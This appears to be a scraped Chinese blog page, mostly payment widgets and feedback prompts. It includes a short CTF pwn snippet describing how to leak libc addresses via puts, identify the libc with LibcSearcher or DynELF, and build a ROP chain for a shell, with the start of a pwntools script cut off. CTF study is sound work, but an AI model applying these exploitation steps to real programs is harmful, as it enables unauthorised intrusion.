02-01 580
看看代码主体 发现没有system函数 但有puts这个函数,就可以通过构造rop泄露出libc的版本和函数地址,利用LibcSearcher或者DynELF可以查到libc的版本,之后获取libc里面的地址构造ROP链,获取shell。 from pwn import * from LibcSearcher import * def encrypt(string): newstr = list(string) for i in range(len(newstr)): c
全栈/Web/Misc/Crypto/Pwn/Re/IoT
最新发布
11-04
全栈是指掌握多种技能的人,能够独立完成一个完整的项目。Web是指基于Web的应用程序,包括前端和后端。Misc是指杂项,包括各种不同类型的题目,如图片隐写、二进制分析等。Crypto是指密码学,包括加密、解密、签名等。Pwn是指利用漏洞攻击程序,获取程序的控制权。Re是指逆向工程,包括反汇编、调试等。IoT是指物联网,包括各种智能设备和传感器。这些都是CTF比赛中常见的方向。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值